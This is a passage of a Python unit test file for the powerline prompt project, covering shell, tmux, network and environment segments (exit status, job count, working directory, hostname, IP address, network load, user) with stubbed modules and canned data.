			{'contents': 'sigsegv+core', 'highlight_groups': ['exit_fail'], 'draw_inner_divider': True}
		])
		segment_info['args'].last_pipe_status = [0, 'sigsegv', 0]
		self.assertEqual(shell.last_pipe_status(pl=pl, segment_info=segment_info), [
			{'contents': '0', 'highlight_groups': ['exit_success'], 'draw_inner_divider': True},
			{'contents': 'sigsegv', 'highlight_groups': ['exit_fail'], 'draw_inner_divider': True},
			{'contents': '0', 'highlight_groups': ['exit_success'], 'draw_inner_divider': True}
		])
		segment_info['args'].last_pipe_status = [0, 'sigsegv+core', 0]
		self.assertEqual(shell.last_pipe_status(pl=pl, segment_info=segment_info), [
			{'contents': '0', 'highlight_groups': ['exit_success'], 'draw_inner_divider': True},
			{'contents': 'sigsegv+core', 'highlight_groups': ['exit_fail'], 'draw_inner_divider': True},
			{'contents': '0', 'highlight_groups': ['exit_success'], 'draw_inner_divider': True}
		])
	def test_jobnum(self):
		'''jobnum hides zero unless show_zero is requested.'''
		pl = Pl()
		segment_info = {'args': Args(jobnum=0)}
		self.assertEqual(shell.jobnum(pl=pl, segment_info=segment_info), None)
		self.assertEqual(shell.jobnum(pl=pl, segment_info=segment_info, show_zero=False), None)
		self.assertEqual(shell.jobnum(pl=pl, segment_info=segment_info, show_zero=True), '0')
		segment_info = {'args': Args(jobnum=1)}
		self.assertEqual(shell.jobnum(pl=pl, segment_info=segment_info), '1')
		self.assertEqual(shell.jobnum(pl=pl, segment_info=segment_info, show_zero=False), '1')
		self.assertEqual(shell.jobnum(pl=pl, segment_info=segment_info, show_zero=True), '1')
	def test_continuation(self):
		'''continuation renders parser_state, honoring omit/align/rename options.'''
		pl = Pl()
		self.assertEqual(shell.continuation(pl=pl, segment_info={}), [{
			'contents': '',
			'width': 'auto',
			'highlight_groups': ['continuation:current', 'continuation'],
		}])
		segment_info = {'parser_state': 'if cmdsubst'}
		self.assertEqual(shell.continuation(pl=pl, segment_info=segment_info), [
			{
				'contents': 'if',
				'draw_inner_divider': True,
				'highlight_groups': ['continuation:current', 'continuation'],
				'width': 'auto',
				'align': 'l',
			},
		])
		self.assertEqual(shell.continuation(pl=pl, segment_info=segment_info, right_align=True), [
			{
				'contents': 'if',
				'draw_inner_divider': True,
				'highlight_groups': ['continuation:current', 'continuation'],
				'width': 'auto',
				'align': 'r',
			},
		])
		self.assertEqual(shell.continuation(pl=pl, segment_info=segment_info, omit_cmdsubst=False), [
			{
				'contents': 'if',
				'draw_inner_divider': True,
				'highlight_groups': ['continuation'],
			},
			{
				'contents': 'cmdsubst',
				'draw_inner_divider': True,
				'highlight_groups': ['continuation:current', 'continuation'],
				'width': 'auto',
				'align': 'l',
			},
		])
		self.assertEqual(shell.continuation(pl=pl, segment_info=segment_info, omit_cmdsubst=False, right_align=True), [
			{
				'contents': 'if',
				'draw_inner_divider': True,
				'highlight_groups': ['continuation'],
				'width': 'auto',
				'align': 'r',
			},
			{
				'contents': 'cmdsubst',
				'draw_inner_divider': True,
				'highlight_groups': ['continuation:current', 'continuation'],
			},
		])
		self.assertEqual(shell.continuation(pl=pl, segment_info=segment_info, omit_cmdsubst=True, right_align=True), [
			{
				'contents': 'if',
				'draw_inner_divider': True,
				'highlight_groups': ['continuation:current', 'continuation'],
				'width': 'auto',
				'align': 'r',
			},
		])
		self.assertEqual(shell.continuation(pl=pl, segment_info=segment_info, omit_cmdsubst=True, right_align=True, renames={'if': 'IF'}), [
			{
				'contents': 'IF',
				'draw_inner_divider': True,
				'highlight_groups': ['continuation:current', 'continuation'],
				'width': 'auto',
				'align': 'r',
			},
		])
		self.assertEqual(shell.continuation(pl=pl, segment_info=segment_info, omit_cmdsubst=True, right_align=True, renames={'if': None}), [
			{
				'contents': '',
				'highlight_groups': ['continuation:current', 'continuation'],
				'width': 'auto',
				'align': 'r',
			},
		])
		segment_info = {'parser_state': 'then then then cmdsubst'}
		self.assertEqual(shell.continuation(pl=pl, segment_info=segment_info), [
			{
				'contents': 'then',
				'draw_inner_divider': True,
				'highlight_groups': ['continuation'],
			},
			{
				'contents': 'then',
				'draw_inner_divider': True,
				'highlight_groups': ['continuation'],
			},
			{
				'contents': 'then',
				'draw_inner_divider': True,
				'highlight_groups': ['continuation:current', 'continuation'],
				'width': 'auto',
				'align': 'l',
			},
		])
	def test_cwd(self):
		'''cwd splits the working directory, honoring home/limit/ellipsis options.'''
		# Fake os module so the segment sees a fixed path separator.
		new_os = new_module('os', path=os.path, sep='/')
		pl = Pl()
		cwd = [None]
		# getcwd stand-in: returns the fixture path, or raises it when the
		# fixture is an Exception instance (to exercise error handling).
		def getcwd():
			wd = cwd[0]
			if isinstance(wd, Exception):
				raise wd
			else:
				return wd
		segment_info = {'getcwd': getcwd, 'home': None}
		with replace_attr(shell, 'os', new_os):
			cwd[0] = '/abc/def/ghi/foo/bar'
			self.assertEqual(shell.cwd(pl=pl, segment_info=segment_info), [
				{'contents': '/', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
				{'contents': 'abc', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
				{'contents': 'def', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
				{'contents': 'ghi', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
				{'contents': 'foo', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
				{'contents': 'bar', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True, 'highlight_groups': ['cwd:current_folder', 'cwd']},
			])
			segment_info['home'] = '/abc/def/ghi'
			self.assertEqual(shell.cwd(pl=pl, segment_info=segment_info), [
				{'contents': '~', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
				{'contents': 'foo', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
				{'contents': 'bar', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True, 'highlight_groups': ['cwd:current_folder', 'cwd']},
			])
			segment_info.update(shortened_path='~foo/ghi')
			self.assertEqual(shell.cwd(pl=pl, segment_info=segment_info), [
				{'contents': '~foo', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
				{'contents': 'ghi', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True, 'highlight_groups': ['cwd:current_folder', 'cwd']},
			])
			self.assertEqual(shell.cwd(pl=pl, segment_info=segment_info, use_shortened_path=False), [
				{'contents': '~', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
				{'contents': 'foo', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
				{'contents': 'bar', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True, 'highlight_groups': ['cwd:current_folder', 'cwd']},
			])
			segment_info.pop('shortened_path')
			self.assertEqual(shell.cwd(pl=pl, segment_info=segment_info, dir_limit_depth=3), [
				{'contents': '~', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
				{'contents': 'foo', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
				{'contents': 'bar', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True, 'highlight_groups': ['cwd:current_folder', 'cwd']}
			])
			self.assertEqual(shell.cwd(pl=pl, segment_info=segment_info, dir_limit_depth=3, shorten_home=False), [
				{'contents': '...', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
				{'contents': 'ghi', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
				{'contents': 'foo', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
				{'contents': 'bar', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True, 'highlight_groups': ['cwd:current_folder', 'cwd']}
			])
			self.assertEqual(shell.cwd(pl=pl, segment_info=segment_info, dir_limit_depth=1), [
				{'contents': '...', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
				{'contents': 'bar', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True, 'highlight_groups': ['cwd:current_folder', 'cwd']}
			])
			self.assertEqual(shell.cwd(pl=pl, segment_info=segment_info, dir_limit_depth=1, ellipsis='---'), [
				{'contents': '---', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
				{'contents': 'bar', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True, 'highlight_groups': ['cwd:current_folder', 'cwd']}
			])
			self.assertEqual(shell.cwd(pl=pl, segment_info=segment_info, dir_limit_depth=1, ellipsis=None), [
				{'contents': 'bar', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True, 'highlight_groups': ['cwd:current_folder', 'cwd']}
			])
			self.assertEqual(shell.cwd(pl=pl, segment_info=segment_info, dir_limit_depth=1, use_path_separator=True), [
				{'contents': '.../', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': False},
				{'contents': 'bar', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': False, 'highlight_groups': ['cwd:current_folder', 'cwd']}
			])
			self.assertEqual(shell.cwd(pl=pl, segment_info=segment_info, dir_limit_depth=1, use_path_separator=True, ellipsis='---'), [
				{'contents': '---/', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': False},
				{'contents': 'bar', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': False, 'highlight_groups': ['cwd:current_folder', 'cwd']}
			])
			self.assertEqual(shell.cwd(pl=pl, segment_info=segment_info, dir_limit_depth=1, use_path_separator=True, ellipsis=None), [
				{'contents': 'bar', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': False, 'highlight_groups': ['cwd:current_folder', 'cwd']}
			])
			self.assertEqual(shell.cwd(pl=pl, segment_info=segment_info, dir_limit_depth=2, dir_shorten_len=2), [
				{'contents': '~', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
				{'contents': 'fo', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
				{'contents': 'bar', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True, 'highlight_groups': ['cwd:current_folder', 'cwd']}
			])
			self.assertEqual(shell.cwd(pl=pl, segment_info=segment_info, dir_limit_depth=2, dir_shorten_len=2, use_path_separator=True), [
				{'contents': '~/', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': False},
				{'contents': 'fo/', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': False},
				{'contents': 'bar', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': False, 'highlight_groups': ['cwd:current_folder', 'cwd']}
			])
			cwd[0] = '/etc'
			self.assertEqual(shell.cwd(pl=pl, segment_info=segment_info, use_path_separator=False), [
				{'contents': '/', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
				{'contents': 'etc', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True, 'highlight_groups': ['cwd:current_folder', 'cwd']},
			])
			self.assertEqual(shell.cwd(pl=pl, segment_info=segment_info, use_path_separator=True), [
				{'contents': '/', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': False},
				{'contents': 'etc', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': False, 'highlight_groups': ['cwd:current_folder', 'cwd']},
			])
			cwd[0] = '/'
			self.assertEqual(shell.cwd(pl=pl, segment_info=segment_info, use_path_separator=False), [
				{'contents': '/', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True, 'highlight_groups': ['cwd:current_folder', 'cwd']},
			])
			self.assertEqual(shell.cwd(pl=pl, segment_info=segment_info, use_path_separator=True), [
				{'contents': '/', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': False, 'highlight_groups': ['cwd:current_folder', 'cwd']},
			])
			# ENOENT from getcwd is rendered as "[not found]"; any other
			# error propagates to the caller.
			ose = OSError()
			ose.errno = 2
			cwd[0] = ose
			self.assertEqual(shell.cwd(pl=pl, segment_info=segment_info, dir_limit_depth=2, dir_shorten_len=2), [
				{'contents': '[not found]', 'divider_highlight_group': 'cwd:divider', 'highlight_groups': ['cwd:current_folder', 'cwd'], 'draw_inner_divider': True}
			])
			cwd[0] = OSError()
			self.assertRaises(OSError, shell.cwd, pl=pl, segment_info=segment_info, dir_limit_depth=2, dir_shorten_len=2)
			cwd[0] = ValueError()
			self.assertRaises(ValueError, shell.cwd, pl=pl, segment_info=segment_info, dir_limit_depth=2, dir_shorten_len=2)
class TestTmux(TestCase):
    """Tests for the powerline tmux segment module."""

    def test_attached_clients(self):
        """attached_clients counts tmux clients and honours ``minimum``."""
        # Canned tmux command output, keyed by subcommand.
        canned = {
            'list-panes': 'session_name\n',
            'list-clients': '/dev/pts/2: 0 [191x51 xterm-256color] (utf8)\n/dev/pts/3: 0 [191x51 xterm-256color] (utf8)',
        }

        def fake_tmux_output(pl, cmd, *args):
            # Unknown subcommands yield None, matching the original stub's
            # implicit fall-through.
            return canned.get(cmd)

        pl = Pl()
        with replace_attr(tmux, 'get_tmux_output', fake_tmux_output):
            # Two clients are attached -> '2'; below the minimum -> None.
            self.assertEqual(tmux.attached_clients(pl=pl), '2')
            self.assertEqual(tmux.attached_clients(pl=pl, minimum=3), None)
class TestCommon(TestCase):
    """Base class for powerline.segments.common.* test cases.

    Subclasses set ``module_name``; the corresponding segment module is
    imported once per class and exposed as ``cls.module``.
    """

    @classmethod
    def setUpClass(cls):
        # __import__ returns the *top-level* ``powerline`` package, so the
        # submodule has to be fetched attribute by attribute afterwards.
        # The str() wrappers keep the names native strings under
        # ``unicode_literals`` on Python 2.
        dotted = 'powerline.segments.common.{0}'.format(cls.module_name)
        top_package = __import__(str(dotted))
        cls.module = getattr(top_package.segments.common, str(cls.module_name))
class TestNet(TestCommon):
    """Tests for powerline.segments.common.net."""

    module_name = 'net'

    def test_hostname(self):
        """hostname(): only_if_ssh and exclude_domain option handling."""
        pl = Pl()
        # With SSH_CLIENT present the segment shows even with only_if_ssh.
        with replace_env('SSH_CLIENT', '192.168.0.12 40921 22') as segment_info:
            with replace_module_module(self.module, 'socket', gethostname=lambda: 'abc'):
                self.assertEqual(self.module.hostname(pl=pl, segment_info=segment_info), 'abc')
                self.assertEqual(self.module.hostname(pl=pl, segment_info=segment_info, only_if_ssh=True), 'abc')
            with replace_module_module(self.module, 'socket', gethostname=lambda: 'abc.mydomain'):
                self.assertEqual(self.module.hostname(pl=pl, segment_info=segment_info), 'abc.mydomain')
                self.assertEqual(self.module.hostname(pl=pl, segment_info=segment_info, exclude_domain=True), 'abc')
                self.assertEqual(self.module.hostname(pl=pl, segment_info=segment_info, only_if_ssh=True), 'abc.mydomain')
                self.assertEqual(self.module.hostname(pl=pl, segment_info=segment_info, only_if_ssh=True, exclude_domain=True), 'abc')
            # Without SSH_CLIENT only_if_ssh must suppress the segment.
            segment_info['environ'].pop('SSH_CLIENT')
            with replace_module_module(self.module, 'socket', gethostname=lambda: 'abc'):
                self.assertEqual(self.module.hostname(pl=pl, segment_info=segment_info), 'abc')
                self.assertEqual(self.module.hostname(pl=pl, segment_info=segment_info, only_if_ssh=True), None)
            with replace_module_module(self.module, 'socket', gethostname=lambda: 'abc.mydomain'):
                self.assertEqual(self.module.hostname(pl=pl, segment_info=segment_info), 'abc.mydomain')
                self.assertEqual(self.module.hostname(pl=pl, segment_info=segment_info, exclude_domain=True), 'abc')
                self.assertEqual(self.module.hostname(pl=pl, segment_info=segment_info, only_if_ssh=True, exclude_domain=True), None)

    def test_external_ip(self):
        """external_ip(): returns the address served by the stubbed urllib reader."""
        pl = Pl()
        with replace_attr(self.module, 'urllib_read', urllib_read):
            self.assertEqual(self.module.external_ip(pl=pl), [{'contents': '127.0.0.1', 'divider_highlight_group': 'background:divider'}])

    def test_internal_ip(self):
        """internal_ip(): interface selection, IPv4/IPv6 and default-gateway lookup."""
        try:
            import netifaces
        except ImportError:
            raise SkipTest('netifaces module is not available')
        pl = Pl()
        # Fake per-interface address data, keyed by netifaces address family.
        addr = {
            'enp2s0': {
                netifaces.AF_INET: [{'addr': '192.168.100.200'}],
                netifaces.AF_INET6: [{'addr': 'feff::5446:5eff:fe5a:7777%enp2s0'}]
            },
            'lo': {
                netifaces.AF_INET: [{'addr': '127.0.0.1'}],
                netifaces.AF_INET6: [{'addr': '::1'}]
            },
            'teredo': {
                # IPv6-only interface: IPv4 queries against it must yield None.
                netifaces.AF_INET6: [{'addr': 'feff::5446:5eff:fe5a:7777'}]
            },
        }
        interfaces = ['lo', 'enp2s0', 'teredo']
        with replace_module_module(
            self.module, 'netifaces',
            interfaces=(lambda: interfaces),
            ifaddresses=(lambda interface: addr[interface]),
            AF_INET=netifaces.AF_INET,
            AF_INET6=netifaces.AF_INET6,
        ):
            self.assertEqual(self.module.internal_ip(pl=pl), '192.168.100.200')
            self.assertEqual(self.module.internal_ip(pl=pl, interface='auto'), '192.168.100.200')
            self.assertEqual(self.module.internal_ip(pl=pl, interface='lo'), '127.0.0.1')
            self.assertEqual(self.module.internal_ip(pl=pl, interface='teredo'), None)
            self.assertEqual(self.module.internal_ip(pl=pl, ipv=4), '192.168.100.200')
            self.assertEqual(self.module.internal_ip(pl=pl, interface='auto', ipv=4), '192.168.100.200')
            self.assertEqual(self.module.internal_ip(pl=pl, interface='lo', ipv=4), '127.0.0.1')
            self.assertEqual(self.module.internal_ip(pl=pl, interface='teredo', ipv=4), None)
            self.assertEqual(self.module.internal_ip(pl=pl, ipv=6), 'feff::5446:5eff:fe5a:7777%enp2s0')
            self.assertEqual(self.module.internal_ip(pl=pl, interface='auto', ipv=6), 'feff::5446:5eff:fe5a:7777%enp2s0')
            self.assertEqual(self.module.internal_ip(pl=pl, interface='lo', ipv=6), '::1')
            self.assertEqual(self.module.internal_ip(pl=pl, interface='teredo', ipv=6), 'feff::5446:5eff:fe5a:7777')
            # Shrink the interface list in place to exercise auto-selection
            # fallback: drop enp2s0, then teredo, then everything.
            interfaces[1:2] = ()
            self.assertEqual(self.module.internal_ip(pl=pl, ipv=6), 'feff::5446:5eff:fe5a:7777')
            interfaces[1:2] = ()
            self.assertEqual(self.module.internal_ip(pl=pl, ipv=6), '::1')
            interfaces[:] = ()
            self.assertEqual(self.module.internal_ip(pl=pl, ipv=6), None)
        gateways = {
            'default': {
                netifaces.AF_INET: ('192.168.100.1', 'enp2s0'),
                netifaces.AF_INET6: ('feff::5446:5eff:fe5a:0001', 'enp2s0')
            }
        }
        with replace_module_module(
            self.module, 'netifaces',
            interfaces=(lambda: interfaces),
            ifaddresses=(lambda interface: addr[interface]),
            gateways=(lambda: gateways),
            AF_INET=netifaces.AF_INET,
            AF_INET6=netifaces.AF_INET6,
        ):
            # default gateway has specified address family
            self.assertEqual(self.module.internal_ip(pl=pl, interface='default_gateway', ipv=4), '192.168.100.200')
            self.assertEqual(self.module.internal_ip(pl=pl, interface='default_gateway', ipv=6), 'feff::5446:5eff:fe5a:7777%enp2s0')
            # default gateway doesn't have specified address family
            gateways['default'] = {}
            self.assertEqual(self.module.internal_ip(pl=pl, interface='default_gateway', ipv=4), None)
            self.assertEqual(self.module.internal_ip(pl=pl, interface='default_gateway', ipv=6), None)

    def test_network_load(self):
        """network_load(): throughput formatting, units and gradient groups.

        The segment samples byte counters in a background thread, so the test
        polls (sleep loops) until the thread has recorded values.
        """
        def gb(interface):
            # Initial counter source: no data available yet.
            return None
        f = [gb]

        # Indirection cell so the counter source can be swapped mid-test.
        def _get_bytes(interface):
            return f[0](interface)
        pl = Pl()
        with replace_attr(self.module, '_get_bytes', _get_bytes):
            self.module.network_load.startup(pl=pl)
            try:
                self.assertEqual(self.module.network_load(pl=pl, interface='eth0'), None)
                sleep(self.module.network_load.interval)
                self.assertEqual(self.module.network_load(pl=pl, interface='eth0'), None)
                # Wait for the sampling thread to record a first reading.
                while 'prev' not in self.module.network_load.interfaces.get('eth0', {}):
                    sleep(0.1)
                self.assertEqual(self.module.network_load(pl=pl, interface='eth0'), None)
                l = [0, 0]

                # Counters now grow by (1200 rx, 2400 tx) bytes per sample,
                # i.e. 1 KiB/s down and 2 KiB/s up at the default interval.
                def gb2(interface):
                    l[0] += 1200
                    l[1] += 2400
                    return tuple(l)
                f[0] = gb2
                while not self.module.network_load.interfaces.get('eth0', {}).get('prev', (None, None))[1]:
                    sleep(0.1)
                self.assertEqual(self.module.network_load(pl=pl, interface='eth0'), [
                    {'divider_highlight_group': 'network_load:divider', 'contents': 'DL 1 KiB/s', 'highlight_groups': ['network_load_recv', 'network_load']},
                    {'divider_highlight_group': 'network_load:divider', 'contents': 'UL 2 KiB/s', 'highlight_groups': ['network_load_sent', 'network_load']},
                ])
                self.assertEqual(self.module.network_load(pl=pl, interface='eth0', recv_format='r {value}', sent_format='s {value}'), [
                    {'divider_highlight_group': 'network_load:divider', 'contents': 'r 1 KiB/s', 'highlight_groups': ['network_load_recv', 'network_load']},
                    {'divider_highlight_group': 'network_load:divider', 'contents': 's 2 KiB/s', 'highlight_groups': ['network_load_sent', 'network_load']},
                ])
                self.assertEqual(self.module.network_load(pl=pl, recv_format='r {value}', sent_format='s {value}', suffix='bps', interface='eth0'), [
                    {'divider_highlight_group': 'network_load:divider', 'contents': 'r 1 Kibps', 'highlight_groups': ['network_load_recv', 'network_load']},
                    {'divider_highlight_group': 'network_load:divider', 'contents': 's 2 Kibps', 'highlight_groups': ['network_load_sent', 'network_load']},
                ])
                self.assertEqual(self.module.network_load(pl=pl, recv_format='r {value}', sent_format='s {value}', si_prefix=True, interface='eth0'), [
                    {'divider_highlight_group': 'network_load:divider', 'contents': 'r 1 kB/s', 'highlight_groups': ['network_load_recv', 'network_load']},
                    {'divider_highlight_group': 'network_load:divider', 'contents': 's 2 kB/s', 'highlight_groups': ['network_load_sent', 'network_load']},
                ])
                # recv_max=0 forces the receive side onto the gradient
                # highlight groups with maximum gradient level.
                self.assertEqual(self.module.network_load(pl=pl, recv_format='r {value}', sent_format='s {value}', recv_max=0, interface='eth0'), [
                    {'divider_highlight_group': 'network_load:divider', 'contents': 'r 1 KiB/s', 'highlight_groups': ['network_load_recv_gradient', 'network_load_gradient', 'network_load_recv', 'network_load'], 'gradient_level': 100},
                    {'divider_highlight_group': 'network_load:divider', 'contents': 's 2 KiB/s', 'highlight_groups': ['network_load_sent', 'network_load']},
                ])

                # Tolerant comparison: timing jitter makes the gradient level
                # only approximately 50.
                class ApproxEqual(object):
                    def __eq__(self, i):
                        return abs(i - 50.0) < 1
                self.assertEqual(self.module.network_load(pl=pl, recv_format='r {value}', sent_format='s {value}', sent_max=4800, interface='eth0'), [
                    {'divider_highlight_group': 'network_load:divider', 'contents': 'r 1 KiB/s', 'highlight_groups': ['network_load_recv', 'network_load']},
                    {'divider_highlight_group': 'network_load:divider', 'contents': 's 2 KiB/s', 'highlight_groups': ['network_load_sent_gradient', 'network_load_gradient', 'network_load_sent', 'network_load'], 'gradient_level': ApproxEqual()},
                ])
            finally:
                # Always stop the sampling thread, even on assertion failure.
                self.module.network_load.shutdown()
class TestEnv(TestCommon):
    """Tests for powerline.segments.common.env."""

    module_name = 'env'

    def test_user(self):
        """user(): name lookup, hide_user and superuser highlighting."""
        new_os = new_module('os', getpid=lambda: 1)

        class Process(object):
            def __init__(self, pid):
                pass

            def username(self):
                return 'def'

            # Mirror the installed psutil's API: Process.username is a
            # property in newer psutil releases but a method in older ones.
            # (Class bodies can read the enclosing method's ``self``.)
            if hasattr(self.module, 'psutil') and not callable(self.module.psutil.Process.username):
                username = property(username)

        struct_passwd = namedtuple('struct_passwd', ('pw_name',))
        new_psutil = new_module('psutil', Process=Process)
        new_pwd = new_module('pwd', getpwuid=lambda uid: struct_passwd(pw_name='def'))
        new_getpass = new_module('getpass', getuser=lambda: 'def')
        pl = Pl()
        with replace_attr(self.module, 'pwd', new_pwd):
            with replace_attr(self.module, 'getpass', new_getpass):
                with replace_attr(self.module, 'os', new_os):
                    with replace_attr(self.module, 'psutil', new_psutil):
                        with replace_attr(self.module, '_geteuid', lambda: 5):
                            self.assertEqual(self.module.user(pl=pl), [
                                {'contents': 'def', 'highlight_groups': ['user']}
                            ])
                            self.assertEqual(self.module.user(pl=pl, hide_user='abc'), [
                                {'contents': 'def', 'highlight_groups': ['user']}
                            ])
                            # Segment is suppressed when the user matches hide_user.
                            self.assertEqual(self.module.user(pl=pl, hide_user='def'), None)
                        with replace_attr(self.module, '_geteuid', lambda: 0):
                            # euid 0: superuser highlight group takes precedence.
                            self.assertEqual(self.module.user(pl=pl), [
                                {'contents': 'def', 'highlight_groups': ['superuser', 'user']}
                            ])

    def test_cwd(self):
        """cwd(): home shortening, depth limiting, separators and errors."""
        new_os = new_module('os', path=os.path, sep='/')
        pl = Pl()
        # The test drives cwd() by mutating cwd[0]; storing an exception
        # there makes the getcwd stub raise it instead of returning.
        cwd = [None]

        def getcwd():
            wd = cwd[0]
            if isinstance(wd, Exception):
                raise wd
            else:
                return wd

        segment_info = {'getcwd': getcwd, 'home': None}
        with replace_attr(self.module, 'os', new_os):
            cwd[0] = '/abc/def/ghi/foo/bar'
            self.assertEqual(self.module.cwd(pl=pl, segment_info=segment_info), [
                {'contents': '/', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
                {'contents': 'abc', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
                {'contents': 'def', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
                {'contents': 'ghi', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
                {'contents': 'foo', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
                {'contents': 'bar', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True, 'highlight_groups': ['cwd:current_folder', 'cwd']},
            ])
            # With home set, the home prefix collapses to '~'.
            segment_info['home'] = '/abc/def/ghi'
            self.assertEqual(self.module.cwd(pl=pl, segment_info=segment_info), [
                {'contents': '~', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
                {'contents': 'foo', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
                {'contents': 'bar', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True, 'highlight_groups': ['cwd:current_folder', 'cwd']},
            ])
            self.assertEqual(self.module.cwd(pl=pl, segment_info=segment_info, dir_limit_depth=3), [
                {'contents': '~', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
                {'contents': 'foo', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
                {'contents': 'bar', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True, 'highlight_groups': ['cwd:current_folder', 'cwd']}
            ])
            # shorten_home=False: depth limiting uses '...' instead of '~'.
            self.assertEqual(self.module.cwd(pl=pl, segment_info=segment_info, dir_limit_depth=3, shorten_home=False), [
                {'contents': '...', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
                {'contents': 'ghi', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
                {'contents': 'foo', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
                {'contents': 'bar', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True, 'highlight_groups': ['cwd:current_folder', 'cwd']}
            ])
            self.assertEqual(self.module.cwd(pl=pl, segment_info=segment_info, dir_limit_depth=1), [
                {'contents': '...', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
                {'contents': 'bar', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True, 'highlight_groups': ['cwd:current_folder', 'cwd']}
            ])
            # Custom and absent ellipsis.
            self.assertEqual(self.module.cwd(pl=pl, segment_info=segment_info, dir_limit_depth=1, ellipsis='---'), [
                {'contents': '---', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
                {'contents': 'bar', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True, 'highlight_groups': ['cwd:current_folder', 'cwd']}
            ])
            self.assertEqual(self.module.cwd(pl=pl, segment_info=segment_info, dir_limit_depth=1, ellipsis=None), [
                {'contents': 'bar', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True, 'highlight_groups': ['cwd:current_folder', 'cwd']}
            ])
            # use_path_separator=True appends '/' to segments and disables
            # the inner divider.
            self.assertEqual(self.module.cwd(pl=pl, segment_info=segment_info, dir_limit_depth=1, use_path_separator=True), [
                {'contents': '.../', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': False},
                {'contents': 'bar', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': False, 'highlight_groups': ['cwd:current_folder', 'cwd']}
            ])
            self.assertEqual(self.module.cwd(pl=pl, segment_info=segment_info, dir_limit_depth=1, use_path_separator=True, ellipsis='---'), [
                {'contents': '---/', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': False},
                {'contents': 'bar', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': False, 'highlight_groups': ['cwd:current_folder', 'cwd']}
            ])
            self.assertEqual(self.module.cwd(pl=pl, segment_info=segment_info, dir_limit_depth=1, use_path_separator=True, ellipsis=None), [
                {'contents': 'bar', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': False, 'highlight_groups': ['cwd:current_folder', 'cwd']}
            ])
            # dir_shorten_len truncates intermediate components ('foo' -> 'fo').
            self.assertEqual(self.module.cwd(pl=pl, segment_info=segment_info, dir_limit_depth=2, dir_shorten_len=2), [
                {'contents': '~', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
                {'contents': 'fo', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
                {'contents': 'bar', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True, 'highlight_groups': ['cwd:current_folder', 'cwd']}
            ])
            self.assertEqual(self.module.cwd(pl=pl, segment_info=segment_info, dir_limit_depth=2, dir_shorten_len=2, use_path_separator=True), [
                {'contents': '~/', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': False},
